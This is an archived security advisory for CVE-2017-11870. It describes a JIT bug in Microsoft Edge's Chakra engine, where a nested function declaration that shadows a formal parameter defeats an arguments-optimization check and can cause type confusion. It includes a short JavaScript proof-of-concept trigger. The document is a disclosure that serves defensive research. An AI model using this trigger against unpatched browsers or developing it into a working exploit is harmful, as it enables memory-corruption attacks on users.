Home / os / winmobile

Microsoft Edge Chakra JIT Incorrect Function Declaration Scope

Posted on 25 November 2017

Microsoft Edge: Chakra: JIT: Incorrect function declaration scope CVE-2017-11870 In the following JavaScript code, both of the print calls must print out "undefined" because of "x" is a formal parameter. But the second print call prints out "function x() { }". This bug may lead to type confusion in JITed code. function f(x) { print(x); { function x() { } } print(x); } The following code in "PreVisitFunction" is used to decide how to optimize arguments. bool doStackArgsOpt = (!pnode->sxFnc.HasAnyWriteToFormals() || funcInfo->GetIsStrictMode()); "HasAnyWriteToFormals" set by "Parser::BindPidRefsInScope" returns true in the following example code where "x" is formal. But the method can't detect the above buggy case, so it may end up wrongly optimizing arguments. function f(x) { x = 1; } PoC: function f(x) { arguments; { function x() { } } } for (let i = 0; i < 10000; i++) f(); This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: lokihardt

 

TOP